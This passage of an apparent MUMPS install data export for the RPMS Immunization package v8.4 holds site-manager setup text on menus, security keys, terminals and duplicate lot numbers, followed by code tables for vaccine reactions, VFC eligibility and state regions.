Duplicate Lot Numbers are resolved under the Manager Menu, "Lot
"DATA",9002084.7,4,1,218,0)
Number Add/Edit" (MGR-->LOT). Go to this option and enter the Lot
"DATA",9002084.7,4,1,219,0)
Number in question. Two or more choices will be presented. Select
"DATA",9002084.7,4,1,220,0)
one of the choices to be the valid Lot Number. Edit this Lot Number,
"DATA",9002084.7,4,1,221,0)
making sure it is Active and that all relevant vaccines are listed
"DATA",9002084.7,4,1,222,0)
under it.
"DATA",9002084.7,4,1,223,0)
"DATA",9002084.7,4,1,224,0)
* STEP 2:
"DATA",9002084.7,4,1,225,0)
---------
"DATA",9002084.7,4,1,226,0)
Select and edit each of the duplicate Lot Numbers.
"DATA",9002084.7,4,1,227,0)
"DATA",9002084.7,4,1,228,0)
Edit the Lot Number itself by placing "z" at the beginning
"DATA",9002084.7,4,1,229,0)
(e.g., 483-116 --> z483-116). If there is a second duplicate, add
"DATA",9002084.7,4,1,230,0)
"zz" to the beginning of that Lot Number; for a third duplicate,
"DATA",9002084.7,4,1,231,0)
add "zzz", and so on. The adding of leading "z"s to the duplicates
"DATA",9002084.7,4,1,232,0)
will make them distinguishable from the valid Lot Number. This
"DATA",9002084.7,4,1,233,0)
method will also make the old duplicate Lot Numbers recognizable on
"DATA",9002084.7,4,1,234,0)
pre-existing visits.
"DATA",9002084.7,4,1,235,0)
"DATA",9002084.7,4,1,236,0)
The duplicate Lot Numbers should also be made INACTIVE.
"DATA",9002084.7,4,1,237,0)
If an old Visit is to be edited and it has one of the old duplicate
"DATA",9002084.7,4,1,238,0)
Lot Numbers, the old duplicate should be replaced with the current
"DATA",9002084.7,4,1,239,0)
valid Lot Number (easily recognized by ignoring the leading "z"s).
"DATA",9002084.7,4,1,240,0)
"DATA",9002084.7,4,1,241,0)
"DATA",9002084.7,4,1,242,0)
"DATA",9002084.7,4,1,243,0)
VII. PROTOCOLS FOR USE BY OTHER PACKAGES
"DATA",9002084.7,4,1,244,0)
---------------------------------------
"DATA",9002084.7,4,1,245,0)
"DATA",9002084.7,4,1,246,0)
RPMS Immunization v8.x contains 3 Lismanager Protocols that may be of
"DATA",9002084.7,4,1,247,0)
use to programmers of other packages:
"DATA",9002084.7,4,1,248,0)
"DATA",9002084.7,4,1,249,0)
1) BI PATIENT VIEW/EDIT EXT CALL - This protocol calls up the Listman
"DATA",9002084.7,4,1,250,0)
Patient View/Edit screen. The called assumes that DFN (patient)
"DATA",9002084.7,4,1,251,0)
defined. Other optional parameters are described in routine
"DATA",9002084.7,4,1,252,0)
HAVEPAT^BIPATVW. Users will only have Edit capability if they
"DATA",9002084.7,4,1,253,0)
hold the BIZ EDIT PATIENTS Key.
"DATA",9002084.7,4,1,254,0)
"DATA",9002084.7,4,1,255,0)
2) BI IMMUNIZATION ADDED - This protocol is an Extended Action Type
"DATA",9002084.7,4,1,256,0)
of Protocol (any protocols entered as ITEMS will be called when
"DATA",9002084.7,4,1,257,0)
this protocol is called). The Description field of this protocol
"DATA",9002084.7,4,1,258,0)
lists all of the defined variables that relate to the immunization
"DATA",9002084.7,4,1,259,0)
that has just been added.
"DATA",9002084.7,4,1,260,0)
"DATA",9002084.7,4,1,261,0)
3) BI IMMUNIZATION DELETED - This protocol is an Extended Action
"DATA",9002084.7,4,1,262,0)
Type of Protocol (any protocols entered as ITEMS will be called
"DATA",9002084.7,4,1,263,0)
when this protocol is called). The Description field of this
"DATA",9002084.7,4,1,264,0)
protocol lists all of the defined variables that relate to the
"DATA",9002084.7,4,1,265,0)
immunization that has just been deleted.
"DATA",9002084.7,4,1,266,0)
"DATA",9002084.7,4,1,267,0)
"DATA",9002084.7,4,1,268,0)
"DATA",9002084.7,4,1,269,0)
*** END OF PACKAGE INFORMATION TEXT ***
"DATA",9002084.7,4,1,270,0)
.
"DATA",9002084.7,122,0)
SETUP INFORMATION FOR VERSION 8.4
"DATA",9002084.7,122,1,0)
^^270^270^3100408^
"DATA",9002084.7,122,1,1,0)
"DATA",9002084.7,122,1,2,0)
The text presented here is intended to provide Site Managers with
"DATA",9002084.7,122,1,3,0)
helpful information regarding setup and management of the RPMS
"DATA",9002084.7,122,1,4,0)
Immunization Package, version 8.4.
"DATA",9002084.7,122,1,5,0)
"DATA",9002084.7,122,1,6,0)
"DATA",9002084.7,122,1,7,0)
"DATA",9002084.7,122,1,8,0)
I. OPTIONS
"DATA",9002084.7,122,1,9,0)
----------
"DATA",9002084.7,122,1,10,0)
"DATA",9002084.7,122,1,11,0)
The main menu option for the Immunization package is BIMENU.
"DATA",9002084.7,122,1,12,0)
At most sites this would be placed on AKMOCORE along with other
"DATA",9002084.7,122,1,13,0)
RPMS packages. For the sake of consistency from site to site,
"DATA",9002084.7,122,1,14,0)
it is recommended that the synonym "IMM" (Immunization) be
"DATA",9002084.7,122,1,15,0)
given to the main menu option BIMENU, however, this is not a
"DATA",9002084.7,122,1,16,0)
requirement. BIMENU allows access to every other option within
"DATA",9002084.7,122,1,17,0)
the package. (The Package Keys, BIZMENU ,BIZ EDIT PATIENTS, and
"DATA",9002084.7,122,1,18,0)
BIZ MANAGER, are discussed below under Security in Section II.)
"DATA",9002084.7,122,1,19,0)
"DATA",9002084.7,122,1,20,0)
The option BI PATIENT VIEW/EDIT, "Patient Immunization Record",
"DATA",9002084.7,122,1,21,0)
is the main option for all users to view a patient's immunization
"DATA",9002084.7,122,1,22,0)
data. This option allows users to display or print the patient's
"DATA",9002084.7,122,1,23,0)
Immunization History and Forecast, Official Immunization Record, and
"DATA",9002084.7,122,1,24,0)
Health Summary. If the user has the appropriate key (BIZ EDIT
"DATA",9002084.7,122,1,25,0)
PATIENTS), additional actions for adding/editing patient data will
"DATA",9002084.7,122,1,26,0)
be made available under this option.
"DATA",9002084.7,122,1,27,0)
"DATA",9002084.7,122,1,28,0)
NOTE: Users accessing this option will have NO ADD/EDIT capability
"DATA",9002084.7,122,1,29,0)
whatsoever--it will be informational only--UNLESS they have
"DATA",9002084.7,122,1,30,0)
the BIZ EDIT PATIENTS Key; in which case additional Add/Edit
"DATA",9002084.7,122,1,31,0)
Actions will be available. (See Security Section II below.)
"DATA",9002084.7,122,1,32,0)
"DATA",9002084.7,122,1,33,0)
This option may be attached to any other Kernel menu and need not
"DATA",9002084.7,122,1,34,0)
be accessed via the main menu, BIMENU. This option is found within
"DATA",9002084.7,122,1,35,0)
the package under the Patient Menu of the Immunization Main Menu.
"DATA",9002084.7,122,1,36,0)
"DATA",9002084.7,122,1,37,0)
After this package has been installed and the BIMENU and BI PATIENT
"DATA",9002084.7,122,1,38,0)
VIEW/EDIT Options added to the appropriate menus, it is a good idea
"DATA",9002084.7,122,1,39,0)
to run the "Build Primary Menu Trees" Option under Kernel Menu
"DATA",9002084.7,122,1,40,0)
Management (under AKMOEVE). This will enable users to jump to menu
"DATA",9002084.7,122,1,41,0)
synonyms within the new Immunization Package.
"DATA",9002084.7,122,1,42,0)
"DATA",9002084.7,122,1,43,0)
There is also an option called BI LOT NUMBER NON-MANAGER, which is
"DATA",9002084.7,122,1,44,0)
locked by the Key BIZ LOT NON-MANAGER. This "stand-alone" option is
"DATA",9002084.7,122,1,45,0)
NOT connected to the rest of the RPMS Immunization Menu; instead it
"DATA",9002084.7,122,1,46,0)
may be assigned to any menu of any user for the purpose of adding and
"DATA",9002084.7,122,1,47,0)
editing Lot Numbers in the Immunization Package. The option allows
"DATA",9002084.7,122,1,48,0)
someone, such as a pharmacist, to add and maintain the Lot Number
"DATA",9002084.7,122,1,49,0)
Inventory without gaining access to the rest of the Manager Menu in
"DATA",9002084.7,122,1,50,0)
the Immunization Package.
"DATA",9002084.7,122,1,51,0)
"DATA",9002084.7,122,1,52,0)
"DATA",9002084.7,122,1,53,0)
"DATA",9002084.7,122,1,54,0)
II. SECURITY
"DATA",9002084.7,122,1,55,0)
------------
"DATA",9002084.7,122,1,56,0)
"DATA",9002084.7,122,1,57,0)
The Security Key BIZMENU allows users to access the Main Menu of
"DATA",9002084.7,122,1,58,0)
the RPMS Immunization Package, BIMENU, and its submenus for viewing
"DATA",9002084.7,122,1,59,0)
Patient data and Reports. The BIZMENU Key does NOT provide any
"DATA",9002084.7,122,1,60,0)
Add or Edit capabilities, however, Holders of this key may print
"DATA",9002084.7,122,1,61,0)
patient letters, view patient data, and run reports.
"DATA",9002084.7,122,1,62,0)
"DATA",9002084.7,122,1,63,0)
The Security Key BIZ EDIT PATIENTS allows users to ADD and EDIT
"DATA",9002084.7,122,1,64,0)
a patient's Immunization History, Contraindications, Skin Tests,
"DATA",9002084.7,122,1,65,0)
Parent/Guardian, etc. This key does not provide access to any
"DATA",9002084.7,122,1,66,0)
additional menu options; instead, it adds several Actions to the
"DATA",9002084.7,122,1,67,0)
main Patient View screen. This Key should be given to staff who
"DATA",9002084.7,122,1,68,0)
are responsible for data entry and Patient Management.
"DATA",9002084.7,122,1,69,0)
"DATA",9002084.7,122,1,70,0)
The security key BIZ MANAGER allows a user to access the Manager
"DATA",9002084.7,122,1,71,0)
Menu (BI MENU-MANAGER), which is a submenu of the main menu (BIMENU).
"DATA",9002084.7,122,1,72,0)
The Manager Menu provides access to many sensitive functions
"DATA",9002084.7,122,1,73,0)
pertaining to Site Parameters, Form Letters, the Vaccine Table,
"DATA",9002084.7,122,1,74,0)
Lot Numbers, Exports, and the allocation of Security Keys.
"DATA",9002084.7,122,1,75,0)
"DATA",9002084.7,122,1,76,0)
The BIZ MANAGER Key should only be given to the manager of the
"DATA",9002084.7,122,1,77,0)
Immunization Package.
"DATA",9002084.7,122,1,78,0)
"DATA",9002084.7,122,1,79,0)
Also see the "Help" Action on the HOLDERS OF IMMUNIZATION
"DATA",9002084.7,122,1,80,0)
KEYS" Screen (MGR-->KEY-->Help).
"DATA",9002084.7,122,1,81,0)
"DATA",9002084.7,122,1,82,0)
Finally, the Key BIZ LOT NON-MANAGER can be given any person (for
"DATA",9002084.7,122,1,83,0)
example, a pharmacist) who needs to add or edit Vaccine Lot Numbers
"DATA",9002084.7,122,1,84,0)
but does not need access to the entire Imm Manager Menu.
"DATA",9002084.7,122,1,85,0)
NOTE: Assignment of this option, BI LOT NUMBER NON-MANAGER, to other
"DATA",9002084.7,122,1,86,0)
menus in RPMS is done by the local site manager, as is the key, BIZ
"DATA",9002084.7,122,1,87,0)
LOT NON-MANAGER. This option and its key cannot be assigned from
"DATA",9002084.7,122,1,88,0)
within the Immunization Package itself.
"DATA",9002084.7,122,1,89,0)
"DATA",9002084.7,122,1,90,0)
"DATA",9002084.7,122,1,91,0)
"DATA",9002084.7,122,1,92,0)
III. DEVICES
"DATA",9002084.7,122,1,93,0)
------------
"DATA",9002084.7,122,1,94,0)
"DATA",9002084.7,122,1,95,0)
This package makes extensive use of the VA Screen Manager and
"DATA",9002084.7,122,1,96,0)
List Manager, which requires that several of the cursor and screen
"DATA",9002084.7,122,1,97,0)
handling fields of the Terminal Type file be present for any Device
"DATA",9002084.7,122,1,98,0)
accessing the package. It is recommended that any Device
"DATA",9002084.7,122,1,99,0)
accessing this package be given a Terminal Type ("Subtype")
"DATA",9002084.7,122,1,100,0)
of "C-VT100", since the standard VA Kernel distribution comes
"DATA",9002084.7,122,1,101,0)
with all of the necessary codes pre-loaded. A user whose Terminal
"DATA",9002084.7,122,1,102,0)
Type does not contain a complete set of screen handling codes will
"DATA",9002084.7,122,1,103,0)
receive a message that Screenman cannot "load the form."
"DATA",9002084.7,122,1,104,0)
"DATA",9002084.7,122,1,105,0)
If you suspect that the screen handling codes for C-VT100 on your
"DATA",9002084.7,122,1,106,0)
system are not complete, this package comes with a routine, BIVT100,
"DATA",9002084.7,122,1,107,0)
that will update (as of 2000) your VT100 codes. The routine must be
"DATA",9002084.7,122,1,108,0)
run from Programmer Mode, and a line with ZIS must be uncommented.
"DATA",9002084.7,122,1,109,0)
This job should be done by a programmer or experienced Site Manager.
"DATA",9002084.7,122,1,110,0)
"DATA",9002084.7,122,1,111,0)
Other Terminal Types may also be chosen, however, the screen
"DATA",9002084.7,122,1,112,0)
handling codes for Cursor movements, "PF keys", "Erase Entire
"DATA",9002084.7,122,1,113,0)
Page", etc., may need to be entered manually if they are not
"DATA",9002084.7,122,1,114,0)
already present for the selected Terminal Type.
"DATA",9002084.7,122,1,115,0)
"DATA",9002084.7,122,1,116,0)
If for some reason it is not practical to define Devices
"DATA",9002084.7,122,1,117,0)
accessing the package with a Subtype of C-VT100, users of the
"DATA",9002084.7,122,1,118,0)
package may be given a "DEFAULT TERMINAL TYPE FOR LM" in the
"DATA",9002084.7,122,1,119,0)
NEW PERSON File #200 of C-VT100. (They will then be given a
"DATA",9002084.7,122,1,120,0)
Terminal Type of C-VT100 regardless of which DEVICE they sign
"DATA",9002084.7,122,1,121,0)
on through.) It may also be necessary to set the field "ASK
"DATA",9002084.7,122,1,122,0)
DEVICE TYPE AT SIGN-ON" (again in file #200) equal to "ASK" in
"DATA",9002084.7,122,1,123,0)
order to get a user's Terminal Type to change to the C-VT100.
"DATA",9002084.7,122,1,124,0)
"DATA",9002084.7,122,1,125,0)
It is important that PC's accessing this software through terminal
"DATA",9002084.7,122,1,126,0)
emulation software have their function keys F1-F4 set to transmit
"DATA",9002084.7,122,1,127,0)
standard VT-100 codes for these keys rather than other customized
"DATA",9002084.7,122,1,128,0)
codes.
"DATA",9002084.7,122,1,129,0)
"DATA",9002084.7,122,1,130,0)
This software makes use of basic character format codes such as
"DATA",9002084.7,122,1,131,0)
Reverse Video, Highlight, and Underlining. It may be helpful to
"DATA",9002084.7,122,1,132,0)
adjust the colors that the terminal emulation software employs to
"DATA",9002084.7,122,1,133,0)
display these formats.
"DATA",9002084.7,122,1,134,0)
"DATA",9002084.7,122,1,135,0)
There are several network terminal emulation programs available,
"DATA",9002084.7,122,1,136,0)
however many of them have limitations such as not recognizing
"DATA",9002084.7,122,1,137,0)
function keys, not displaying reverse video, not slave printing, etc.
"DATA",9002084.7,122,1,138,0)
As of this printing, February 2004, we have found that NetTerm 4.2e
"DATA",9002084.7,122,1,139,0)
available at a nominal cost from Intersoft International, Inc. via
"DATA",9002084.7,122,1,140,0)
the WWW, is among the best products for use with RPMS software.
"DATA",9002084.7,122,1,141,0)
Trial versions may be obtained online at:
"DATA",9002084.7,122,1,142,0)
http://www.securenetterm.com/html/netterm.html
"DATA",9002084.7,122,1,143,0)
"DATA",9002084.7,122,1,144,0)
Initial difficulties with the screen handling codes for ScreenMan
"DATA",9002084.7,122,1,145,0)
and Listman are not specific to Immunization; however, if problems
"DATA",9002084.7,122,1,146,0)
with the setup cannot be resolved, please contact your Computer
"DATA",9002084.7,122,1,147,0)
Support staff for further assistance.
"DATA",9002084.7,122,1,148,0)
"DATA",9002084.7,122,1,149,0)
"DATA",9002084.7,122,1,150,0)
"DATA",9002084.7,122,1,151,0)
IV. SITE PARAMETERS
"DATA",9002084.7,122,1,152,0)
--------------------
"DATA",9002084.7,122,1,153,0)
"DATA",9002084.7,122,1,154,0)
As part of the installation of this new version of Immunization,
"DATA",9002084.7,122,1,155,0)
the site parameters must be reviewed and edited.
"DATA",9002084.7,122,1,156,0)
"DATA",9002084.7,122,1,157,0)
The Site Parameter screen may be accessed from within the
"DATA",9002084.7,122,1,158,0)
Immunization menus by selecting Manager Menu from the the Main Menu,
"DATA",9002084.7,122,1,159,0)
and then selecting Edit Site Parameters (MGR-->ESP). Help text is
"DATA",9002084.7,122,1,160,0)
displayed during the edit each Site Parameter.
"DATA",9002084.7,122,1,161,0)
"DATA",9002084.7,122,1,162,0)
"DATA",9002084.7,122,1,163,0)
"DATA",9002084.7,122,1,164,0)
V. VACCINE TABLE
"DATA",9002084.7,122,1,165,0)
-------------------
"DATA",9002084.7,122,1,166,0)
"DATA",9002084.7,122,1,167,0)
The Immunization Package version 8.1 comes with a new Vaccine Table
"DATA",9002084.7,122,1,168,0)
that has been standardized with the CDC's NIP HL7/CVX Code Table.
"DATA",9002084.7,122,1,169,0)
The vaccine table, spellings, CVX codes and CPT codes are taken directly
"DATA",9002084.7,122,1,170,0)
from the CDC table http://www.cdc.gov/nip/registry/hl7/hl7-cvx.pdf.
"DATA",9002084.7,122,1,171,0)
There are several new fields in the Vaccine Table that relate to new
"DATA",9002084.7,122,1,172,0)
functions in the package, most notably the ImmServe Forecasting
"DATA",9002084.7,122,1,173,0)
utility (See IV. above). For this reason it is critically important
"DATA",9002084.7,122,1,174,0)
that specific fields within the table not be altered.
"DATA",9002084.7,122,1,175,0)
"DATA",9002084.7,122,1,176,0)
Each time a user logs into the Immunization Package, the Vaccine
"DATA",9002084.7,122,1,177,0)
Table is checked for integrity. If certain fields have been altered,
"DATA",9002084.7,122,1,178,0)
a warning message is issued, and several functions within the package
"DATA",9002084.7,122,1,179,0)
begin to display the warning. Some basic functions of the package
"DATA",9002084.7,122,1,180,0)
will continue to operate, such as the display of a patient's
"DATA",9002084.7,122,1,181,0)
immunization history. Other functions will only display the warning.
"DATA",9002084.7,122,1,182,0)
"DATA",9002084.7,122,1,183,0)
Listed below is the text of the warning. (Users without the BIZ
"DATA",9002084.7,122,1,184,0)
MANAGER Key will not see the last paragraph.) As the warning
"DATA",9002084.7,122,1,185,0)
indicates, restandardizing the table simply involves selecting "RES"
"DATA",9002084.7,122,1,186,0)
from the Manager Menu. This can be done at any time, and users need
"DATA",9002084.7,122,1,187,0)
not log out of the package. Runtime is a few seconds at most.
"DATA",9002084.7,122,1,188,0)
"DATA",9002084.7,122,1,189,0)
WARNING
"DATA",9002084.7,122,1,190,0)
---------
"DATA",9002084.7,122,1,191,0)
"DATA",9002084.7,122,1,192,0)
Vaccine Table (IMMUNIZATION File) is not standard--cannot proceed.
"DATA",9002084.7,122,1,193,0)
"DATA",9002084.7,122,1,194,0)
At this point you should back out of the Immunization Package
"DATA",9002084.7,122,1,195,0)
and contact your site manager or the person in charge of the
"DATA",9002084.7,122,1,196,0)
Immunization Software.
"DATA",9002084.7,122,1,197,0)
"DATA",9002084.7,122,1,198,0)
Or, you may fix this by Restandardizing the Immunization File.
"DATA",9002084.7,122,1,199,0)
To do so, proceed to the Manager Menu and select Restandardize.
"DATA",9002084.7,122,1,200,0)
(Menu Synonyms: MGR-->RES)
"DATA",9002084.7,122,1,201,0)
"DATA",9002084.7,122,1,202,0)
"DATA",9002084.7,122,1,203,0)
"DATA",9002084.7,122,1,204,0)
VI. DUPLICATE LOT NUMBERS
"DATA",9002084.7,122,1,205,0)
-------------------------
"DATA",9002084.7,122,1,206,0)
"DATA",9002084.7,122,1,207,0)
Some sites have duplicate Lot Numbers in their IMMUNIZATION LOT File,
"DATA",9002084.7,122,1,208,0)
which will cause the storing of Immunizations in the V IMMUNIZATION
"DATA",9002084.7,122,1,209,0)
File to fail. RPMS Immunization v8.1 recognizes duplicate Lot
"DATA",9002084.7,122,1,210,0)
Numbers ahead of time and informs the user. If the user holds the
"DATA",9002084.7,122,1,211,0)
BIZ MANAGER Key, the text below will be displayed:
"DATA",9002084.7,122,1,212,0)
"DATA",9002084.7,122,1,213,0)
Two steps should be taken to resolve duplicate Lot Numbers:
"DATA",9002084.7,122,1,214,0)
"DATA",9002084.7,122,1,215,0)
* STEP 1:
"DATA",9002084.7,122,1,216,0)
---------
"DATA",9002084.7,122,1,217,0)
Duplicate Lot Numbers are resolved under the Manager Menu, "Lot
"DATA",9002084.7,122,1,218,0)
Number Add/Edit" (MGR-->LOT). Go to this option and enter the Lot
"DATA",9002084.7,122,1,219,0)
Number in question. Two or more choices will be presented. Select
"DATA",9002084.7,122,1,220,0)
one of the choices to be the valid Lot Number. Edit this Lot Number,
"DATA",9002084.7,122,1,221,0)
making sure it is Active and that all relevant vaccines are listed
"DATA",9002084.7,122,1,222,0)
under it.
"DATA",9002084.7,122,1,223,0)
"DATA",9002084.7,122,1,224,0)
* STEP 2:
"DATA",9002084.7,122,1,225,0)
---------
"DATA",9002084.7,122,1,226,0)
Select and edit each of the duplicate Lot Numbers.
"DATA",9002084.7,122,1,227,0)
"DATA",9002084.7,122,1,228,0)
Edit the Lot Number itself by placing "z" at the beginning
"DATA",9002084.7,122,1,229,0)
(e.g., 483-116 --> z483-116). If there is a second duplicate, add
"DATA",9002084.7,122,1,230,0)
"zz" to the beginning of that Lot Number; for a third duplicate,
"DATA",9002084.7,122,1,231,0)
add "zzz", and so on. The adding of leading "z"s to the duplicates
"DATA",9002084.7,122,1,232,0)
will make them distinguishable from the valid Lot Number. This
"DATA",9002084.7,122,1,233,0)
method will also make the old duplicate Lot Numbers recognizable on
"DATA",9002084.7,122,1,234,0)
pre-existing visits.
"DATA",9002084.7,122,1,235,0)
"DATA",9002084.7,122,1,236,0)
The duplicate Lot Numbers should also be made INACTIVE.
"DATA",9002084.7,122,1,237,0)
If an old Visit is to be edited and it has one of the old duplicate
"DATA",9002084.7,122,1,238,0)
Lot Numbers, the old duplicate should be replaced with the current
"DATA",9002084.7,122,1,239,0)
valid Lot Number (easily recognized by ignoring the leading "z"s).
"DATA",9002084.7,122,1,240,0)
"DATA",9002084.7,122,1,241,0)
"DATA",9002084.7,122,1,242,0)
"DATA",9002084.7,122,1,243,0)
VII. PROTOCOLS FOR USE BY OTHER PACKAGES
"DATA",9002084.7,122,1,244,0)
---------------------------------------
"DATA",9002084.7,122,1,245,0)
"DATA",9002084.7,122,1,246,0)
RPMS Immunization v8.x contains 3 Lismanager Protocols that may be of
"DATA",9002084.7,122,1,247,0)
use to programmers of other packages:
"DATA",9002084.7,122,1,248,0)
"DATA",9002084.7,122,1,249,0)
1) BI PATIENT VIEW/EDIT EXT CALL - This protocol calls up the Listman
"DATA",9002084.7,122,1,250,0)
Patient View/Edit screen. The called assumes that DFN (patient)
"DATA",9002084.7,122,1,251,0)
defined. Other optional parameters are described in routine
"DATA",9002084.7,122,1,252,0)
HAVEPAT^BIPATVW. Users will only have Edit capability if they
"DATA",9002084.7,122,1,253,0)
hold the BIZ EDIT PATIENTS Key.
"DATA",9002084.7,122,1,254,0)
"DATA",9002084.7,122,1,255,0)
2) BI IMMUNIZATION ADDED - This protocol is an Extended Action Type
"DATA",9002084.7,122,1,256,0)
of Protocol (any protocols entered as ITEMS will be called when
"DATA",9002084.7,122,1,257,0)
this protocol is called). The Description field of this protocol
"DATA",9002084.7,122,1,258,0)
lists all of the defined variables that relate to the immunization
"DATA",9002084.7,122,1,259,0)
that has just been added.
"DATA",9002084.7,122,1,260,0)
"DATA",9002084.7,122,1,261,0)
3) BI IMMUNIZATION DELETED - This protocol is an Extended Action
"DATA",9002084.7,122,1,262,0)
Type of Protocol (any protocols entered as ITEMS will be called
"DATA",9002084.7,122,1,263,0)
when this protocol is called). The Description field of this
"DATA",9002084.7,122,1,264,0)
protocol lists all of the defined variables that relate to the
"DATA",9002084.7,122,1,265,0)
immunization that has just been deleted.
"DATA",9002084.7,122,1,266,0)
"DATA",9002084.7,122,1,267,0)
"DATA",9002084.7,122,1,268,0)
"DATA",9002084.7,122,1,269,0)
*** END OF PACKAGE INFORMATION TEXT ***
"DATA",9002084.7,122,1,270,0)
.
"DATA",9002084.8,1,0)
Fever
"DATA",9002084.8,2,0)
Fever^1^0
"DATA",9002084.8,3,0)
Irritability^2^0
"DATA",9002084.8,4,0)
Local Reaction or Swelling^3^0
"DATA",9002084.8,5,0)
Vomiting^4^0
"DATA",9002084.8,6,0)
Rash or Itching^5^0
"DATA",9002084.8,7,0)
Lethargy^6^1
"DATA",9002084.8,8,0)
Convulsions^7^1
"DATA",9002084.8,9,0)
Arthritis or Arthralgias^8^1
"DATA",9002084.8,10,0)
Anaphylaxis or Collapse^9^1
"DATA",9002084.8,11,0)
Respiratory Distress^10^0
"DATA",9002084.8,12,0)
Other^11^0
"DATA",9002084.8,13,0)
Fever>104^12^1
"DATA",9002084.8,14,0)
Swelling>4cm^13^1
"DATA",9002084.82,2,0)
Phone Number^11^Phone
"DATA",9002084.82,3,0)
Address^12^Address
"DATA",9002084.82,4,0)
Immunization History^13^History
"DATA",9002084.82,5,0)
Lot Numbers (Immunization History)^14^Lot Numbers
"DATA",9002084.82,6,0)
Facility where shot was given (Immunization History)^22^Facility
"DATA",9002084.82,7,0)
Directions to House^16^Directions
"DATA",9002084.82,8,0)
Parent/Guardian^17^Parent/Guardian
"DATA",9002084.82,9,0)
Case Manager^18^Case Mgr
"DATA",9002084.82,10,0)
Reason Inactivated^19^Reason Inactivated
"DATA",9002084.82,11,0)
Skin Tests^20^Skin Tests
"DATA",9002084.82,12,0)
Next Appointment (RPMS Scheduling)^21^Next Appt
"DATA",9002084.82,13,0)
Forecast^15^Forecast
"DATA",9002084.82,14,0)
Refusals^23^Refusals
"DATA",9002084.82,15,0)
VFC (Immunization History)^25^VFC
"DATA",9002084.83,1,0)
V01^Not Eligible^0^Not Eligible^NotElig
"DATA",9002084.83,2,0)
V02^Medicaid^0^Medicaid^Medicaid
"DATA",9002084.83,3,0)
V03^Uninsured^0^Uninsured^Uninsured
"DATA",9002084.83,4,0)
V04^Am Indian/AK Native^0^Am Indian/AK Native^AmIn/AKNa
"DATA",9002084.83,5,0)
V05^Underinsured Fed Qualified^0^Underinsured Fed Qualified^Under/Fed
"DATA",9002084.83,6,0)
V06^State-specific Elig^0^State-specific Elig^State
"DATA",9002084.83,7,0)
V07^Local-specific Elig^0^Local-specific Elig^Local
"DATA",9002084.83,8,0)
999^Unknown^0^Unable to obtain^Unknown
"DATA",9002084.83,10,0)
AKA01^ALASKA-01^1
"DATA",9002084.83,11,0)
AKA02^ALASKA-02^1
"DATA",9002084.83,12,0)
AKA03^ALASKA-03^1
"DATA",9002084.83,13,0)
AKA04^ALASKA-04^1
"DATA",9002084.83,14,0)
AKA05^ALASKA-05^1
"DATA",9002084.83,15,0)
AKA06^ALASKA-06^1
"DATA",9002084.83,16,0)
ALA01^ALABAMA-01^1
"DATA",9002084.83,17,0)
ALA02^ALABAMA-02^1
"DATA",9002084.83,18,0)
ALA03^ALABAMA-03^1
"DATA",9002084.83,19,0)
ALA04^ALABAMA-04^1
"DATA",9002084.83,20,0)
ALA05^ALABAMA-05^1
"DATA",9002084.83,21,0)
ALA06^ALABAMA-06^1
"DATA",9002084.83,22,0)
ARA01^ARKANSAS-01^1
"DATA",9002084.83,23,0)
ARA02^ARKANSAS-02^1
"DATA",9002084.83,24,0)
ARA03^ARKANSAS-03^1
"DATA",9002084.83,25,0)
ARA04^ARKANSAS-04^1
"DATA",9002084.83,26,0)
ARA05^ARKANSAS-05^1
"DATA",9002084.83,27,0)
ARA06^ARKANSAS-06^1
"DATA",9002084.83,28,0)
ASA01^AMERICAN SAMOA-01^1
"DATA",9002084.83,29,0)
ASA02^AMERICAN SAMOA-02^1
"DATA",9002084.83,30,0)
ASA03^AMERICAN SAMOA-03^1
"DATA",9002084.83,31,0)
ASA04^AMERICAN SAMOA-04^1
"DATA",9002084.83,32,0)
ASA05^AMERICAN SAMOA-05^1
"DATA",9002084.83,33,0)
ASA06^AMERICAN SAMOA-06^1
"DATA",9002084.83,34,0)
AZA01^ARIZONA-01^1
"DATA",9002084.83,35,0)
AZA02^ARIZONA-02^1
"DATA",9002084.83,36,0)
AZA03^ARIZONA-03^1
"DATA",9002084.83,37,0)
AZA04^ARIZONA-04^1
"DATA",9002084.83,38,0)
AZA05^ARIZONA-05^1
"DATA",9002084.83,39,0)
AZA06^ARIZONA-06^1
"DATA",9002084.83,40,0)
BAA01^NEW YORK CITY-01^1
"DATA",9002084.83,41,0)
BAA02^NEW YORK CITY-02^1
"DATA",9002084.83,42,0)
BAA03^NEW YORK CITY-03^1
"DATA",9002084.83,43,0)
BAA04^NEW YORK CITY-04^1
"DATA",9002084.83,44,0)
BAA05^NEW YORK CITY-05^1
"DATA",9002084.83,45,0)
BAA06^NEW YORK CITY-06^1
"DATA",9002084.83,46,0)
CAA01^CALIFORNIA-01^1
"DATA",9002084.83,47,0)
CAA02^CALIFORNIA-02^1
"DATA",9002084.83,48,0)
CAA03^CALIFORNIA-03^1
"DATA",9002084.83,49,0)
CAA04^CALIFORNIA-04^1
"DATA",9002084.83,50,0)
CAA05^CALIFORNIA-05^1
"DATA",9002084.83,51,0)
CAA06^CALIFORNIA-06^1
"DATA",9002084.83,52,0)
CHA01^CHICAGO-01^1
"DATA",9002084.83,53,0)
CHA02^CHICAGO-02^1
"DATA",9002084.83,54,0)
CHA03^CHICAGO-03^1
"DATA",9002084.83,55,0)
CHA04^CHICAGO-04^1
"DATA",9002084.83,56,0)
CHA05^CHICAGO-05^1
"DATA",9002084.83,57,0)
CHA06^CHICAGO-06^1
"DATA",9002084.83,58,0)
COA01^COLORADO-01^1
"DATA",9002084.83,59,0)
COA02^COLORADO-02^1
"DATA",9002084.83,60,0)
COA03^COLORADO-03^1
"DATA",9002084.83,61,0)
COA04^COLORADO-04^1
"DATA",9002084.83,62,0)
COA05^COLORADO-05^1
"DATA",9002084.83,63,0)
COA06^COLORADO-06^1
"DATA",9002084.83,64,0)
CTA01^CONNECTICUT-01^1
"DATA",9002084.83,65,0)
CTA02^CONNECTICUT-02^1
"DATA",9002084.83,66,0)
CTA03^CONNECTICUT-03^1
"DATA",9002084.83,67,0)
CTA04^CONNECTICUT-04^1
"DATA",9002084.83,68,0)
CTA05^CONNECTICUT-05^1
"DATA",9002084.83,69,0)
CTA06^CONNECTICUT-06^1
"DATA",9002084.83,70,0)
DCA01^DISTRICT OF COLUMBIA-01^1
"DATA",9002084.83,71,0)
DCA02^DISTRICT OF COLUMBIA-02^1
"DATA",9002084.83,72,0)
DCA03^DISTRICT OF COLUMBIA-03^1
"DATA",9002084.83,73,0)
DCA04^DISTRICT OF COLUMBIA-04^1
"DATA",9002084.83,74,0)
DCA05^DISTRICT OF COLUMBIA-05^1
"DATA",9002084.83,75,0)
DCA06^DISTRICT OF COLUMBIA-06^1
